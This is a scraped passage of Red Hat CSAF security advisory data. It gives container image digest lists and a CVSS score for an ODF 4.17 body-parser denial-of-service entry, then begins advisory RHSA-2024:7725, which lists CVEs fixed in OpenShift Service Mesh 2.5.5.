"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x", ], }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 7.5, baseSeverity: "HIGH", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", version: "3.1", }, products: [ "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x", ], }, ], threats: [ { category: "impact", details: "Important", }, ], title: "body-parser: Denial of Service Vulnerability in body-parser", }, ], }
RHSA-2024:7725
Vulnerability from csaf_redhat
Published
2024-10-07 09:24
Modified
2025-04-10 00:21
Summary
Red Hat Security Advisory: Red Hat OpenShift Service Mesh Containers for 2.5.5
Notes
Topic
Red Hat OpenShift Service Mesh Containers for 2.5.5
This update has a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a
detailed severity rating, is available for each vulnerability from the CVE
link(s) in the References section.
Details
Red Hat OpenShift Service Mesh is Red Hat's distribution of the Istio service mesh project, tailored for installation into an OpenShift Container Platform installation.
Security Fix(es):
* send: Code Execution Vulnerability in Send Library (CVE-2024-43799)
* serve-static: Improper Sanitization in serve-static (CVE-2024-43800)
* webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule
(CVE-2024-43788)
* envoy: Envoy incorrectly accepts HTTP 200 response for entering upgrade mode (CVE-2024-23326)
* body-parser: Denial of Service Vulnerability in body-parser (CVE-2024-45590)
* envoy: Brotli decompressor infinite loop (CVE-2024-32976)
* envoy: abnormal termination when using auto_sni with authority header longer
than 255 characters (CVE-2024-32475)
* envoy: HTTP/2 CPU exhaustion due to CONTINUATION frame flood (CVE-2024-30255)
* envoy: Potential to manipulate `x-envoy` headers from external sources (CVE-2024-45806)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
Terms of Use
This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.
{ document: { aggregate_severity: { namespace: "https://access.redhat.com/security/updates/classification/", text: "Important", }, category: "csaf_security_advisory", csaf_version: "2.0", distribution: { text: "Copyright © Red Hat, Inc. All rights reserved.", tlp: { label: "WHITE", url: "https://www.first.org/tlp/", }, }, lang: "en", notes: [ { category: "summary", text: "Red Hat OpenShift Service Mesh Containers for 2.5.5\n\nThis update has a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a\ndetailed severity rating, is available for each vulnerability from the CVE\nlink(s) in the References section.", title: "Topic", }, { category: "general", text: "Red Hat OpenShift Service Mesh is Red Hat's distribution of the Istio service mesh project, tailored for installation into an OpenShift Container Platform installation.\n\nSecurity Fix(es):\n* send: Code Execution Vulnerability in Send Library (CVE-2024-43799)\n* serve-static: Improper Sanitization in serve-static (CVE-2024-43800)\n* webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule\n(CVE-2024-43788)\n* envoy: Envoy incorrectly accepts HTTP 200 response for entering upgrade mode (CVE-2024-23326)\n* body-parser: Denial of Service Vulnerability in body-parser (CVE-2024-45590)\n* envoy: Brotli decompressor infinite loop (CVE-2024-32976)\n* envoy: abnormal termination when using auto_sni with authority header longer\nthan 255 characters (CVE-2024-32475)\n* envoy: HTTP/2 CPU exhaustion due to CONTINUATION frame flood (CVE-2024-30255)\n* envoy: Potential to manipulate `x-envoy` headers from external sources (CVE-2024-45806)\n\nFor more details 